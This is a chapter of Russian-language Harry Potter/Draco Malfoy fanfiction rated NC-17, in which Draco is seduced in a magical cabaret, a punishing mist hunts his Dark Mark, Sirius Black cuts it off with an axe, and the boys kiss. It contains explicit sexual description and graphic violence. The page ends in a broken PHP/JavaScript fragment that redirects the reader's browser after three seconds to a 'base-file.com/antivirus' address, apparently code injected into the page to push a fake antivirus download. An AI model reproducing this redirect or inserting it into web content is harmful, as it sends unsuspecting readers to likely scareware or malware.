Ничья земля

Автор: Umbridge
Пайринг: Гарри Поттер/Драко Малфой
Рейтинг: NC-17
Жанр: action/agnst/romance
Саммари: Добро пожаловать! Вас приветствует НИЧЬЯ ЗЕМЛЯ! Забудьте все, чем вы были раньше. Здесь нет власти, но есть правила. Соблюдайте их - и вы выиграете!
Предупреждение: гет в 10 и 11 главах. ГП/ДУ, ДМ/НЖП, АУ 7 книги

Глава 11. Салки

(Глава, в которой зло будет наказано, Гарри узнает цену вещам, а Драко встретит помощника)

- Отвали, – отчеканил Драко и вывернулся из рук гриффиндорца.

- Что не так? – растерянно спросил тот.

- Все отлично! – Делая шаг назад, проговорил слизеринец. 

И тут стены исчезли, опрокидывая на  мальчиков море увядающего вечернего света. Гарри на секунду ослеп. Солнце было повсюду. Ничего не разобрать. Моргая, Гарри потер глаза. Очки тут же съехали на бок, и мальчик поправил их. Река – он увидел ее сразу, как только смог видеть. Берега поросли лесом, спускавшимся к самой воде. Внизу, у холмом лежал город. Ничего подозрительного. Похоже, путникам пока ничто не угрожает. Гарри развернулся к Малфою.

- Отлично… - он покачал головой и пошел по берегу в сторону города.

Да, Гарри злился. Злился на Драко за его глупые обиды, которые тот любовно оберегал. Но через несколько миль злость отступила, вытесняемая чувствами иного рода. Гарри задумался. Виденные им в лабиринте сцены должны были сказать о чем-то важном. Не с проста Земля показала их.

- Малфой, - резко окликнул Гарри, - когда ты был в лабиринте - ты не видел… прошлое?

- Нет. – Отрезал Драко. – И если бы ты так не торопился бросить меня одного, то знал бы все сам! – добавил он, не глядя на Гарри.

- Может, тебя за руку надо было держать? – Раздражаясь, поинтересовался тот. - Я должен знать, видел ты что-то в этом чертовом лабиринте или нет. Это важно!

- А мне какое дело – важно тебе или нет? Важно – шел бы со мной и смотрел! – огрызнулся Драко.

- Хватит валять дурака! – повысил голос гриффиндорец. Драко кивнул:

- Конечно.

Горячая волна ударила в голову.

- Да пошел ты к черту! Ломаешься, как девчонка! Что не так-то, а?! Объясни! Помогать не хочешь… Вообще, ты чего-нибудь хочешь? – проорал Гарри ему в лицо.

- Не хочу! - выпалил тот, краснея, - ничего я не хочу уже, ясно? – и размашисто зашагал прочь.

- Куда пошел?! Стой! Я еще не закончил! - крикнул Гарри. Слизеринец прибавил шагу.

- Девчонка, - догоняя его, процедил гриффиндорец.

            Они шли вдоль реки, но та больше не шумела на порогах. Отражая смешение серого и розового на палитре неба, она разлилась широко, двигалась степенно и плавно между поросших травой и тростником берегов, изгибаясь, спускалась в долину, где жались друг к другу дома незнакомого города. Их крыши тонули в растекавшихся по земле сумерках, и лишь суровый шпиль колокольни возвышался в светлом небе, напоминая о высшем суде.

До города было не далеко. Только небольшая прогулка в низину. Гарри гадал –какие там дома? Обжитые, с уютным светом через занавески, с цветами в кашпо, с перилами, пахнущими свежей краской, или брошенные, нежилые, пропитанные сыростью и тлением, с провалами выбитых стекал, словно слепцы? Ждет ли там испытание? А может, подумал Гарри с тайной надеждой, там я найду ответ на вопрос и вернусь? Гриффиндорец с нежностью вспомнил Нору. Скорей бы попасть туда и больше никогда не видеть Малфоя.

Драко брел впереди, перебирая, как четки, сказанные с горяча слова. Добравшись до вопроса о лабиринте, он вспомнил опускающего палочку Лестранжа, Лестранжа, приказавшего вернуть на место порошок слепоты, Лестранжа, выросшего и раздавшегося в плечах. Да, в последнее время тюремщик изменился. Не было больше двусмысленных прикосновений, долгих масляных взглядов. Драко решил тогда – Лестранж затаился. Но сейчас кусочки головоломки заняли свои места. Картина сложилась. Лестранж, кажется, вовсе не был Лестранжем. По позвоночнику побежали ледяные мурашки. Мальчик боялся верить. Ведь если догадка верна – у него есть шанс спастись. Пытаясь успокоиться, Драко тихо вдохнул. Вместе с речным воздухом в легкие просочился холод, и мальчику стало неуютно и одиноко на промозглом ветре, у темной, опасной воды. Захотелось остановиться и дождаться  Поттера, оказаться поближе к нему, подпитаться его уверенностью, почувствовать себя защищенным. Драко пошел медленнее, внимательно прислушиваясь – идет ли гриффиндорец сзади.

Пробиваясь через пелену облаков, над рекой разливался сиреневый закат. Траву и песок сменил щебень, потом – брусчатка набережной. Драко бил ладонью по парапету в такт ударявшимся о камень волнам. От усталости кружилась голова, и мальчик не раздумывая пошел за Поттером, когда тот свернул с набережной на городскую улицу.

            Она была такой узкой, что пройти можно было только друг за другом. Ветхие строения почти дрожали на ветру, наползали друг на друга, жались, как сироты. В окнах не горел свет. Ни в одном. Словно ручей, кривая темная улица впадала в океан необъятной, мощеной булыжником площади.

            Мимо высохшего фонтана мальчики перешли на противоположную сторону и остановились у двухэтажного деревянного дома. «Подходящее место для ночлега», - решил Гарри. Он постучал в дверь прибитым в центре стальным кольцом и прислушался. Внутри было тихо: ни шарканья, ни топота, ни шороха. Гарри снова постучал. И снова на стук никто не отозвался. «Найдем другое», - отправляясь дальше, сказал себе Гарри.

Но его уверенность оказалась напрасной. Скоро выяснилось – куда бы не постучали мальчики, им отвечала тишина. Выбить дверь или влезть в окно тоже оказалось невозможным. Словно что-то не пускало путников.

Солнце на прощание лизнуло малиновым тучи и скрылось за горизонтом. Идеально черная и густая, как вакса сапожника, на город опустилась ночь. Драко и Гарри не разговаривали, но думали об одном  – похоже спать придется прямо на мостовой.

Миновав еще квартал, мальчики почти потеряли надежду найти место для ночлега, когда до их ушей донеслись приглушенные звуки. На соседней улице играла музыка. Ориентируясь по нее, Гарри свернул в арку длинного кирпичного дома. Драко не отставал. Через секунду оба оказались у сиявшего огнями здания. Подъезд украшали гирлянды разноцветных лампочек. Гарри поднял голову, пригляделся. Красный, синий, желтый – огни зажигались и гасли, выписывая в темнеющем небе - «Кабаре «Салки».

- Зайдем? – не глядя на гриффиндорца, спросил Драко.

- Да, - ответил Гарри и толкнул зеркальную дверь.

Слизеринец скривил губы. Вместо «Салки» он прочитал «Силки».

Вслушиваясь в надвигавшиеся звуки незнакомой мелодии, Драко вошел в тесное помещение, стены которого были обиты розовым шелком. Комната воплощала собой плебейские представления о роскоши. Бордовые диваны и низкие кресла с золочеными витыми ручками, золоченая вешалка для шляп и зонтов, золоченая люстра с множеством стеклянных подвесок. Зеркало от пола до потолка, сверкавшее позолотой. На стенах картины в золоченых рамах. На холстах – обнаженные мужчины и женщины застыли в откровенных позах. Драко старался не смотреть них, чувствуя стеснение, словно стал свидетелем чего-то неприличного. В этой комнате ему было тревожно.

Окинув помещение быстрым взглядом, Гарри направился к стоявшему у противоположной стены столу. За ним, наваливший грудью на столешницу, сидел лысоватый человечек и изучал мальчиков через толстые круглые очки.

- Билеты? – поинтересовался он.

- В смысле? – удивился Гарри. Никаких билетов у них не было.

- Вам билеты?!

Гарри бросил взгляд на спутника, но тот только независимо пожал плечами.

- Какие билеты? – переспросил Гарри.

- Вам туда? - Человек указал кривым пальцем на дверь рядом, - если туда - берите билеты, - он потряс костяными счетами, - если нет – убирайтесь.

- Туда, -  быстро ответил Гарри, - давайте билеты.

Человека со счетами он окрестил Кассиром.

- Сколько? – поинтересовался тот.

- Два, - раздраженно бросил гриффиндорец, - не видите, нас двое?

Поджав губы, Кассир скрылся под столешницей. Вынырнув через несколько минут, он  протянул Гарри два бумажных прямоугольника. Не благодаря, гриффиндорец выхватил билеты, и, развернувшись, толкнул дверь. Звуки, запахи, цвета посыпались на путников, как игрушки из шкафа. Гарри замер на пороге. Перед ним был огромный зал, освещенный люстрой на тысячу свечей, полный вычурно одетых людей, шума и душных ароматов. Широкая мраморная лестница вела на второй этаж. Множество дверей выходили на тянувшийся по всему периметру зала балкон. Гарри никогда не видел ломберных столов, танцовщиц, жонглировавших горящими булавами. Не видел рулетки, не вдыхал густой сигарный дым. Всплески пронзительного хохота, хриплые голоса, оркестр, гремевший что-то быстрое – все это смутило мальчика.

- Вино? Лучшее. Виски? Крепчайший. Шампанское? Шампанское! Поглядите-ка, как играет! – прокричал в ухо визгливый голос. Гарри вздрогнул от неожиданности. И тут словно из воздуха перед ним нарисовался вертлявый человечек. Пританцовывая, он переставлял бокалы на подносе и подергивал себя за лацкан потрепанного смокинга. - Вино? Лучшее. Виски? Крепчайший. Шампанское? Шампанское! Поглядите-ка, как играет! – повторил человечек.

- Нет. – Отрезал Гарри.

- Давайте шампанского! – громко сказал слизеринец, хватая с подноса бокал.

- Сдурел? – Гарри потянулся отнять его, но спутник резко отвел руку.

- Не указывай мне, Поттер, - вспыхнув, огрызнулся Драко и выпил. В горле приятно защипало, в животе потеплело.

- Дайте еще! – приказал Драко вертевшемуся рядом официанту.

- Да уберетесь вы или нет? – заорал Гарри человечку с подносом, но слизеринец уже опустошил второй бокал.

- А если там яд?

- Яд? Ну и что?! – Драко расхохотался. От усталости и голода его повело. Оттолкнув гриффиндорца, он пошел в гудящую толпу.

- Куда тебя несет? – прошипел Гарри  в ухо восхищенно озиравшемуся Малфою, - мне все это не нравиться!

- И что, Поттер? – бросил Драко, - мне плевать. Отстань.

- Я уверен – тут не все так просто.

- У тебя паранойя. Ты не способен наслаждаться, и мне не даешь. Или ты думал, что я буду убиваться из-за тебя? – Слизеринец манерным движением откинул упавшую на глаза челку, - Ты как всегда самонадеян, – он пьяно усмехнулся.

- Я сяду, - отворачиваясь, процедил Гарри. Он заметил у стены диваны и направился к ним.

Помедлив, Драко все же пошел следом.

Найти свободный диван оказалось не просто. Спотыкаясь о чужие ноги, мальчики обошли пол зала, прежде чем нашли куда сесть. Стоило Гарри опуститься на атласные подушки, усталость навалилась с утроенной силой.

Усевшись, Драко  взял еще шампанского. Голова кружилось, тело окатило жаром.

- Какой нежный, - услышал он вдруг. У их дивана стояли две женщины: рыжая и черноволосая. Они шептались, глядя на Драко. Заметив, что он смотрит, рыжая улыбнулась и села к нему на колени.

- Что такой совсем маленький мальчик делает тут? – спросила она, обдавая слизеринца запахом дыни. Ее голос – глубокий, тягучий, чуть в нос – был неприятным, но Драко хотелось слушать его. От женщины сладко пахло духами и пудрой, осыпавшейся на зеленое платье. Ярко-рубиновые губы растягивала сахарная ухмылка, а ярко-синие глаза казались еще ярче от густо-наложенной туши. В рыжей все было замысловато, вычурно, вульгарно: и уложенные в неопрятную прическу волосы, и бархатное платье с пожелтевшими от времени кружевами, и широкий костяной веер из алого китайского шелка.

- Вовсе я не маленький! – вспыхнул Драко. – Мне уже восемнадцать!

- Оооо! – томно глядя из-под тяжелых ресниц, протянула рыжая. Она сидела беспокойно, и от ее движений в голове становилось пусто, а во рту - сухо. Драко покраснел. Он боялся обнаружить свое возбуждение и не знал, чего хочет больше: чтобы она слезла или чтобы осталась сидеть, покачиваясь на его коленях из стороны в сторону.

- Кто вы и что вам надо? – ледяной голос привел мальчика в чувства. Драко повернулся и увидел гриффиндорца. Сжав кулаки, тот сверлил рыжую бешеным взглядом. Вторая женщина с полуулыбкой на скуластом восточном лице, опустилась рядом с Драко и принялась  расчесывать пальцами его волосы.

- Иди к нам, сладкий, - позвала она Гарри, и ее голос был баюкающим, как волна и прохладным, как морской ветер.

- Я спросил, что вам нужно? Оставьте нас! – рявкнул гриффиндорец.

- Какой у тебя злой дружок, - прижимаясь к Драко мягкой припудренной грудью, гнусаво протянула рыжая и потерлась о его пах бархатным бедром, - нам уйти?

- Вот именно – уйти, - отрезал Гарри, непроизвольно засовывая руку в карман. За палочкой.

- Он мне не дружок! – Преувеличенно возмутился слизеринец. – Поттер у нас что-то вроде местного дурачка. Об этом даже в газетах писали.

- Ты что, идиот? – раздраженно спросил Гарри, - а вы что, глухие? Пошли вон отсюда!

- Грубый! – обиделась рыжая. Потом жеманно поправила волосы, – грубый маленький дурак!

Драко по-хозяйски обнял ее.

- Не слушай его… Убирайся, Поттер. Не видишь, я занят.

- Ты рехнулся. – Процедил тот сквозь зубы, - Тут что-то не так! Не понял еще? С чего бы тебе вдруг им понравиться?

- Но он такой хорошенький… – прогнусавила рыжая, потрепав Драко по щеке. Тот побледнел.

- Идем с нами! – пропела черноволосая. Она и рыжая повисли на слизеринце, увлекая за собой, - тебе будет хорошо.

- Вернись немедленно! – полетело в спину, но Драко не обернулся.

Крепко обнимая подруг за бархатные талии, он прошествовал к одной из опоясывающих залу дверей и распахнул ее. Алый диван полукругом у стены, такой широкий, что на нем без труда могли улечься трое, плотные бархатные портьеры, низкий столик, шампанское в ведерке со льдом, три бокала – все в маленькой комнатке призывало расслабиться и наслаждаться. Но слизеринец смутился еще сильнее. Стараясь не подать виду, он развалился на мягком сидение между рыжей и брюнеткой.

- Ты такой свежий. Такой сладкий. – Шептали женщины и их ладони скользили по его плечам, груди, бедрам.

- Ты еще не знал женщины? – спросила рыжая, выдыхая слова ему в рот.

- Конечно, знал! - слишком поспешно возмутился мальчик.

 - Ну конечно. – Прошептала брюнетка, убирая за ухо прядь его волос, - это сразу видно.

- Ты такой опытный.

- И солидный.

- Мы сразу догадались.

- Нравятся мои сестрички? – спросила рыжая, прижав руку Драко ладонью к видневшемуся над корсетом соску.

- Красивые? – прошептала темноволосая, почти касаясь губами его уха.

- Да. - Выдохнул Драко.  Мысли вязли и не желали двигаться. Сердце почему-то билось сразу и в груди и в животе.

- И ты, конечно, знаешь, как женщины пахнут? – подняла тонкие брови рыжая и потянула его руку вниз, по расшитой ткани корсета, под задранную юбку.

- Не бойся, - прошептала темноволосая. Ее рука, легкая, словно бабочка, порхнула на его бедро. Легко накрыла ладонью головку. Легко поглаживая, скользнула вниз.  Драко закрыл глаза, не видя, а только чувствуя щекотное прикосновение прядей. Рыжая наклонилась поцеловать его. И он вдруг представил, что нет никаких девиц, а рядом сидит Поттер, и это его губы касаются губ, его пальцы ласкают умело. Драко почти почувствовал щербинку на его зубе, почти ощутил его запах.

Как вдруг все прекратилось.

Покинутый и непонимающий, мальчик открыл глаза. Обе женщины стояли над ним. Теперь их лица, их глаза выражали другое: презрение, ненависть.

Драко никак не мог собраться с мыслями. Он открыл рот, переводя взгляд с одной на другую.

- Зло, - показав на него пальцем, прошипела рыжая. Драко растерянно моргал.

- Зло будет наказано. – Произнесла другая холодно.

 - Уничтожено.

Драко не поверил своим глазам. Женщины превращались. Их глаза почернели, изо рта повалил черный пар.

- Что сидишь – беги, - шепнул насмешливый голос. Мальчик вздрогнул.

- Мою мамашу… - протянул голос над ухом. Что-то дернуло вверх. Приподняло в воздух.  Ворот мантии врезался в горло. По лицу скользнул бархат портьер. Секунда. И Драко оказался на полу. От удара спиной перехватило дыхание. Несколько мгновений слизеринец пытался вздохнуть.

- Чего разлегся? – поинтересовался голос. Драко сел, озираясь. И увидел белую изнанку портьер, беленые стены коридора, и Сириуса Блека. Не сводя глаз с дядюшки, слизеринец попятился.

- Смотри куда идешь, - с глумливой ухмылкой Блек указал за спину мальчика. Тот повернулся и уставился на тяжелую ткань, не понимая, что должен увидеть.

- Ты тупой. Смотри вниз.

Драко посмотрел. Из-под портьер просачивался черный густой пар. Соприкоснувшись с ним, ткань с шипением вспыхнула и загорелась.

- Карающий туман. Почувствовал твою метку. Беги или превратишься в пепел, - скучным тоном сообщил дядюшка.

- Что?

- В пепел! Я – твой помощник, - вздохнул Блек, - беги уже или умрешь.

- Что? – Драко еще секунду смотрел на туман, а потом повернулся и побежал.

Драко не думал, что умеет бегать так быстро. Белые стены. Поворот. Снова белое справа, слева. Крутая лестница вниз. Снова поворот. За ним слизеринец увидел дверь. Несколько футов, и Драко рванул ее на себя. Та не поддалась. Драко дернул ручку вниз и толкнул. Дверь не открылась. 

- Ну же! – простонал слизеринец. Он подергал ручку. Вверх-вниз. Потянул, снова толкнул. Еще раз потянул. И еще.

- Черт! Что за ерунда! – Закричал Драко и пнул дверь ногой.  Та не поддалась.

- Не может этого быть… Ключ… - прошептал он. И тут заметил Блека. Тот с живым интересом наблюдал за ним.

- Что смотришь? – бросился к нему слизеринец, - ты – помощник! Так помогай! Давай! Что мне делать? Что у тебя? Ключ? Отмычка? Что там еще?

- Топор, - довольно улыбаясь, отозвался Блек.

- Что? – опешил Драко.

- Топор. Отличный, большой топор. Таким мясо разделывают.

- Топор?

- Ты что, глухой?! – разозлился Блек, - топор, топор, обух, топорище. Не в курсе, что такое топор? Вот, смотри!

И дядюшка показал мальчику громадный, ржавый топор.

Драко стоял, переводя взгляд с топора на помощника, и обратно, не понимая, что происходит.

- И что? – наконец выдавил он.

- Что, что… - Блек закатил глаза, - то! Я должен отрубить тебе руку. Хотя если хочешь… - Блэк с усмешкой протянул топор Драко.

- Что? – повторил слизеринец, хватаясь за это слово, как за спасательный круг.

- Ты еще не понял? – Блек покачал головой, - на твоей руке метка. Что не удивительно. Достойный наследник достойного семейства. Эту метку почуял карающий туман. С ней он тебя отсюда живым не выпустит. Поэтому, надо от нее избавиться.

- Как? – спросил Драко.

- Да почему я тебе все время дважды повторяю? Отрубить тебе руку.

- Руку…

- Да руку, руку… Ну хочешь еще и ногу… - Блек расхохотался, потом серьезно добавил, - ладно, пора. Сейчас он будет здесь. Спросишь кто, отрублю голову. Срезать кусок не выйдет, метка… Туман ее чувствует. Так. Решай, руби сам или я это сделаю.

Драко никак не мог придти в себя. Как это можно отрубить ему руку? Это его рука и он ей пользовался. И это больно.

- Ты врешь! – воскликнул мальчик, сжимая кулаки.

- Я бы мог напомнить, что к старшим обращаются на вы, но да ладно. Я не могу врать. К сожалению. Я твой помощник, и должен сделать все для твоего спасения. Понял, Малфой?

- Почему ты? – прошептал Драко. Его трясло. Сжимая челюсти до боли в скулах, мальчик старался скрыть дрожь.

- Хотел бы я знать, - вздохнул Блек устало, - может потому что мне тебя не жалко?

Драко не ответил. Зубы начинали колотиться друг о друга, стоило ему открыть рот.

- Ну, делать-то что будем? – поинтересовался Блек.

- Открой дверь. – Выдавил Драко.

- Не могу.

- Можешь.

- Неа.

- Ты специально! – Воскликнул мальчик. И тут в конце коридора разглядел тонкую струйку черного пара.

- Ну вот. Уже тут. А мы еще и не начинали. Малфой, не трусь. Это быстро. Раз и все.

- Нет. Нет. Я не могу. Мне будет больно. – Пробормотал Драко, отступая к двери. Ему хотелось кричать. – Он не убьет меня. Он не сможет. Поттер меня найдет.

- Гарри… - Блек нежно улыбнулся.

 - Ему не дадут. – Мрачно посмотрев на слизеринца, добавил он.

- Откуда ты знаешь? – Сдавленный шепот. Слова выходили с трудом, застревали в горле. Развернувшись, мальчик начал дергать дверь.

- Дай топор! Ее можно выломать! – Бросаясь к помощнику, закричал он.

Тот мрачно покачал головой.

- Не получится. Попробуй, но говорю сразу – нет.

Драко выхватил у него топор. Откуда-то взялись силы. Без труда замахнувшись, мальчик ударил по дереву. На гладкой поверхности не осталось даже следа.

- Нет… Не надо. Мне будет больно.

Силы исчезли так же внезапно, как появились. Их просто не стало. Уронив топор на пол, Драко сел рядом. Он прижал к груди левую руку, лаская и баюкая ее.

- Да я быстро. – Утешил его Сириус, поднимая топор. – Иди сюда.

Драко помотал головой. Почти весь коридор заполнил густой черный пар.

- Да брось! А так ты умрешь, - Блек протянул руку к мальчику. Тот взвизгнул:

- Нет!

- Ну, хватит!

Не медля больше ни минуты, Сириус Блек крепко стиснул запястье Драко. Дернул. Замахнулся топором. Лезвие рассекло воздух.

И тут слизеринец отключился.

- Вернись немедленно! – крикнул Гарри Малфою в спину, но тот даже не обернулся. Вскочив, гриффиндорец бросился следом. Оркестр заиграл быстрее, вокруг пары танцевали фокстрот. Миновав ломберные столы, Гарри столкнулся с высокой темноволосой маской. Она схватила его за руку. Обняла за талию, закружила, увлекая за собой. Гарри с трудом вырвался. Налетая на танцующих, он принялся вертеть головой, высматривая Драко. Но сначала заметил рыжую. Та уже поднималась на второй этаж в компании своей подруги и слизеринца. Гарри рванул к лестнице, и был почти у цели. Когда перед ним как из-под земли возник человечек с подносом.

- Человек. Он так устроен. Сел, ему надо встать, встал – надо ходить, ходит – надо бегать, а как бегать научится – то скорее бы полежать.

- Иди к черту, - Гарри оттолкнул его. Поднос перевернулся. На пол полетели стаканы, бокалы и рюмки. Волна осколков обрызгала туфли танцоров. Музыка стихла.

В спину неслись ругательства. Гриффиндорец не обернулся. Подняв голову, он увидел, как Драко скрывается за одной из дверей. До лестницы оставалось несколько шагов. Но тут оркестр грянул мазурку. Маски снова пустились в пляс.

- Да пропустите вы! – кричал Гарри в расшитые стеклярусом и усыпанные блестками забрала, но в ответ ему лишь смеялись и хватали за руки. Гарри заблудился среди юбок,  корсетов, запутался в ветхом кружеве, ухмылках, расползавшихся на белых лицах подобно ранам. Он рвался. Толкал. Его толкали. Мелькали манжеты. Шляпы. Перья. Гремела музыка. От сладкого запаха духов и тления кружилась голова. Наконец прорвавшись к лестнице, Гарри взлетел наверх. И остановился. Крашеное дерево, золоченые наличники и ручки – все двери на втором этаже были похожи, и Гарри не был уверен, что знает, какая из них ему нужна. Подумав несколько секунд, он решил поискать Драко в восьмой от лестницы комнате и поспешил к ней. Там целовались две маски в одинаковых синих платьях. Смутившись, Гарри осторожно прикрыл дверь. Прикинув, Гарри решил проверить девятую комнату, но в ней мужчина подливал в бокал женщине что-то алое, а женщина кивала, и ее высокая старомодная прическа качалась в такт. Оставались еще две комнаты. Гарри открыл дверь в седьмую. За ней старик и юноша обнимали девицу, а та целовала молодого, облизывая языком его губы, и терлась задом о бедра старика, тяжело дышавшего между ее голых лопаток. Разозлившись, гриффиндорец хлопнул дверью, и наугад вошел в следующий номер. С золоченой цифрой шесть. Внутри никого не было.

Мальчик огляделся. Сгоревший до половины ковер, почерневший от копоти диван - похоже, здесь был пожар. Вдруг на черном от сажи полу Гарри заметил что-то красное. В животе тревожно заворочалось предчувствие. Нагнувшись, гриффиндорец протянул руку и поднял алый костяной веер. В эту секунду ему стало окончательно ясно – именно в эту комнату вошел Драко. Выпрямившись, мальчик швырнул находку на диван. В портьерах напротив входа зияла дыра. Подойдя ближе, Гарри заглянул в нее и увидел узкий коридор. Сделав шаг внутрь, гриффиндорец посмотрел вокруг. Высоко под потолком качались закопченные светильники, заполняя пространство тусклым светом. Стены покрывала копоть. Видимо, огонь добрался и сюда. Оставляя на черном полу белые следы, Гарри пошел вперед.

Пройдя несколько футов и свернув за угол, мальчик оказался перед каменной лестницей, уходившей вниз. Не долго думая, Гарри спустился по ней и снова очутился в коридоре. Здесь тоже были видны приметы недавнего пожара. Продолжив путь, гриффиндорец отшагал сотню футов, и, миновав поворот, увидел дверь. Огонь пощадил ее, и на расстоянии нескольких шагов вокруг стены, пол и потолок оставались белыми. Если не считать бардовых пятен на полу и на стене. Гарри присмотрелся. Кровь. Гриффиндорец видел ее столько раз, что не мог ошибиться. Ему стало страшно. Кинувшись к двери, он попытался открыть ее, но понял – она заперта. В щели между деревом и наличниками просачивался ночной воздух, холодя горячие щеки. Присев на корточки, Гарри просунул пальцы в зазор под дверью. Подушечки коснулись холодных гладких булыжников, потом нащупали землю и снова камни. «Мостовая», - решил гриффиндорец, поднимаясь. Похоже, дверь вела на улицу. И кто-то запер ее снаружи. Но если Малфой был в комнате, а потом вышел сюда, покинуть коридор он мог только через эту дверь. Гарри развернулся и побежал по коридору обратно.

            Выскочив из комнаты, он быстро спустился в зал. Оркестр играл кадриль. Но  теперь никто не удерживал Гарри и он спокойно добрался до выхода. Вылетев на улицу, гриффиндорец побежал направо от подъезда. Позади остались огни вывески. Завернув за угол, мальчик оказался в темноте. Миновав проулок, Гарри выбежал к задней стороне здания. Не на параллельную улицу, как думал сначала. А во двор в колодце старых домов. 

На мостовой в желтом пятне света лежал человек.

- Малфой! – крикнул Гарри. Мгновение. И он уже стоял на коленях рядом с Драко.

- Как ты? – схватив слизеринца за руку, пробормотал Гарри. Рука казалось ледяной, а на предплечье уродливыми узлами вился шрам. В голове крутилось множество вопросов, но гриффиндорец не успел задать ни одного. Малфой бросился ему на шею, а Гарри стиснул его, грозя сломать ребра. Потом слизеринец вскинул голову,  и тут Гарри поцеловал его.

Вместе с тошнотой пришло удивление: почему он лежит? Драко резко сел. Оказавшаяся слишком тяжелой голова потянула назад, и он обхватил себя за колени, чтобы не упасть. Постепенно в голове прояснялось. Слизеринец открыл глаза и поморщился. Высоко над ним висел масляный фонарь. Свет слепил. И внезапно Драко вспомнил: рука! Захлебываясь ужасом, слизеринец дернул вверх кисть и уставился на нее. Все было на месте, до единого пальца. «Приснилось», - мелькнула мысль.  Но тут взгляд скользнул от ладони вниз. Ниже небрежно закатанного рукава предплечье опоясывал толстый шрам, змеиным хвостом спускавшийся к запястью. Метка пропала. Драко внимательно смотрел на руку. Так внимательно и сосредоточенно, что не услышал шаги, и опомнился только, когда увидел стоявшего перед ним на коленях Поттера. Тот зачем то схватил его за запястье, начал гладить и ощупывать. Понимание пришло через секунду, когда тепло нежных тревожных прикосновений достигло сердца. И Драко затопила  чистая неуправляемая радость. Не думая, он бросился Поттеру на шею. И через секунду оказалось, что они целуются, и Драко чувствует солоноватый пот на губах, жесткая щетина стирает кожу, язык гриффиндорца, горячий, напористый, заставлял поддаваться. Драко неловко открыл рот, стараясь не отставать, стукнулся зубами о зубы Поттера. Но поцелуй все равно был прекрасным. Первым в его жизни настоящим поцелуем.

Отстранившись, они оба смутились. Но это было легкое, счастливое смущение. Чистое,  странно волнующее.

- Давай помогу.

Помогая подняться, Гарри бережно поддерживал слизеринца под локоть, слишком пристально следил за собственными пальцами, сомкнувшимися на рукаве чужой мантии.

- Эм… Спасибо… - не пытаясь помешать ему, отозвался Драко, тоже не отрывая глаз от руки спутника.

- Сейчас… Почищу, - Гарри начал отряхивать его. Тщательно и долго. Драко не возражал. Он стоял безмолвно, позволяя Поттеру делать все, что тот хотел.

- И тут… - Гарри наконец оставил мантию в покое, выпрямился и посмотрел в лицо слизеринца. Тот медленно поднял глаза, стараясь казаться невозмутимым. Но щеки пылали и сердце оглушительно стучало в груди. Драко даже показалось, что видно, как дергается мантия от этих ударов.

 – Кровь…

Гарри поплевал на пальцы и попытался вытереть щеку слизеринца, и тот снова не помешал ему, глядя не отрываясь на его губы.

- Сейчас, - сказал Гарри. Он достал флягу. Смочив водой платок, бережно обтер лицо Драко.

- Ну, как ты?

- Нормально, - отозвался тот. Голос казался чужим и не слушался.

- Точно? Ну идем… Давай я тебе помогу… Нам надо найти место для ночлега…

Драко кивнул. Хотя при слове «ночлег» в животе стало жарко.

Предыдущая глава   Оглавление   Следующая глава

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>